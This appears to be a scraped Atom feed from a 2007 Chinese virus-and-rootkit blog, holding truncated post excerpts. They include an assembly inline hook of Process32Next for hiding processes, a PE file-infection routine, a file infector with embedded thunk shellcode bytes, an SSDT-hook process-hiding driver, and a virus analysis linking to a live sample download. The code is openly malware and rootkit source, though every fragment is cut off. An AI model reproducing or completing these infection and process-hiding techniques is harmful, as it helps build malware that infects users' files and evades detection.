tag:blogger.com,1999:blog-57322686081634647952011-06-07T23:27:45.011-07:00VIRII,ROOTKITrobinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.comBlogger111100tag:blogger.com,1999:blog-5732268608163464795.post-27730140847972397562007-06-08T09:06:00.001-07:002007-06-08T09:06:58.841-07:00

应用层的InlineHook汇编实现.586.model flat,stdcalloption casemap:noneinclude ../include/windows.incinclude ../include/user32.incincludelib ../lib/user32.libinclude ../include/kernel32.incincludelib ../lib/kernel32.libinclude ../include/shell32.incincludelib ../lib/shell32.lib.datakernel32 db 'kernel32.dll',0P32First db 'Process32Next',0inline db 'Hook Process32Next Hide Process:)',0sztext

浪心noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-75590796030774738592007-05-03T22:20:00.000-07:002007-05-03T22:21:13.370-07:00

/*===================================================================* Filename CheckKernel.c** Author: kcrazy* Email: thekcrazy@gmail.com** Description: 检查Windows所使用的内核及HAL的原始版本** Date: 2007-4-27 Original from kcrazy* * Version: 1.0==================================================================*/#include #include #include #pragma comment (lib, "Version.lib")DWORD IsPAE( VOID );

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-53063012239136180232007-04-21T01:27:00.000-07:002007-04-21T01:55:16.972-07:00

************************************************************************************以下为分析过程************************************************************************************00436716 > 55 PUSH EBP00436717 8BEC MOV EBP,ESP00436719 83C4 D0 ADD ESP,-300043671C 53 PUSH EBX0043671D 56 PUSH ESI0043671E 57 PUSH

Santiagohttp://www.blogger.com/profile/08641560320859150156noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-44108309265816874382007-04-15T06:58:00.000-07:002007-04-15T07:00:14.305-07:00

实验性质的东西仍然属于bind infection的一种，只不过他是把宿主文件的e_lfanew指向了后面病毒PE的PE HEADER，我测试了一下，如果PE HEADER的SizeOfHeaders大于4k的话程序就不能被load，也就是说宿主程序大小+病毒的所有头大小+病毒的节表大小不能大于4K，这样的话这种感染方式就没有实用价值了。以上说法如有错误，请批评指正嘿嘿～BOOL CInfection::InfectFile(LPCTSTR lpVirus, LPCTSTR lpHost){ CFileMap fm(lpHost) ; DWORD dwHostSize = fm.GetSize() ; if (0 == dwHostSize) return false ; /* 如果宿主文件大于4k的话,被感染后的SizeOfHeaders有可能大于4k 如果

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-49309702691552111792007-04-15T06:43:00.000-07:002007-04-15T06:47:29.283-07:00

//修改了几个BUG,但是仍有一处致命问题是thunk code里的函数地址是编译时确定的//修改了PE空隙大小计算问题，读写文件问题//感谢icefall以及看雪上的网友的指正。//有时间时我将继续修改这个代码#include #include #pragma comment(lib,"kernel32.lib")#pragma comment(lib,"user32.lib")char szHostFile[] = "c:\\hello.exe" ;PIMAGE_DOS_HEADER pImageDosHeader ;PIMAGE_NT_HEADERS pImageNtHeaders ;PIMAGE_SECTION_HEADER pImageSectionHeader ;unsigned char thunkcode[] = "\x60\x9c\xe8\x00\x00\x00\x00

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-48116551882908639142007-04-15T06:34:00.000-07:002007-04-15T06:37:41.342-07:00

/*################################################################## HideProc.C Author :robinh00d[F-13 Lab] Email :cr4zyexpl0rer_at_gmail.com HomePage :http://cr4zyexpl0rer.googlepages.com Last Updated :2006-03-23 个人练习之作，都是几年前的老技术了 基本上是copy别人的代码 通过HOOK SSDT来实现对指定进程的隐藏 windows自带的任务管理器以及PSAPI都是利用ZwQuerySystemInformation 来实现进程的遍历######################################################

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-15021593150426369372007-04-15T06:29:00.000-07:002007-04-15T06:32:39.169-07:00

作者：Robinh00d最近几个月，互联网上突然出现大量的感染式的病毒比如威金、熊猫烧香等，这些病毒都是使用了文件捆绑的方式实现的感染，清除起来比较容易。近日，我偶然获得了一个比较特殊的病毒样本，被感染的是QQ的在线升级程序，它并没有采用前面所说的“捆绑式”感染，而是采用了“壳”的技术实现的感染，比较新颖，下面是我对这个病毒进行的分析：【样本下载地址】http://cr4zyexpl0rer.googlepages.com/NewVirus.rar【分析环境】VMWARE+WINDOWS XP SP2+OLLYDBG+PEID+PEInfo首先用PEID扫描一下没有扫描出壳或者编译器特征，入口点RVA是0x70000,进一步使用PE分析工具查看关键的数据信息，我这里使用的是PEInfo：可以看到，代码入口不是在常规的.text节里而是在.rdata节里再看输入表信息：输入表的RVA是

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-90119450520050467892007-04-10T00:55:00.000-07:002007-04-10T00:56:28.071-07:00

驱动部分;@echo off;goto make;********************************************************************;author :dge;homepage:http://llfdge.googlepages.com/;date :2007.3.16;********************************************************************.386.model flat, stdcalloption casemap:noneinclude d:\masm32\include\w2k\ntstatus.incinclude d:\masm32\include\w2k\ntddk.incinclude

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-82391814648825325882007-04-10T00:49:00.000-07:002007-04-10T00:53:47.849-07:00

我左八荣，右八耻，三个代表在腰间，一团和谐在胸口，王挡杀王，后挡杀后，佛挡杀佛！

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-22006563153216345752007-04-01T22:31:00.000-07:002007-04-01T22:33:00.625-07:00

blogspot终于又能访问了，汗一个。。。

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0tag:blogger.com,1999:blog-5732268608163464795.post-8611314770922915692007-03-29T04:11:00.000-07:002007-04-01T22:30:34.446-07:00

致力于病毒，rootkit研究的组织

robinh00dhttp://www.blogger.com/profile/10060088227706465751noreply@blogger.com0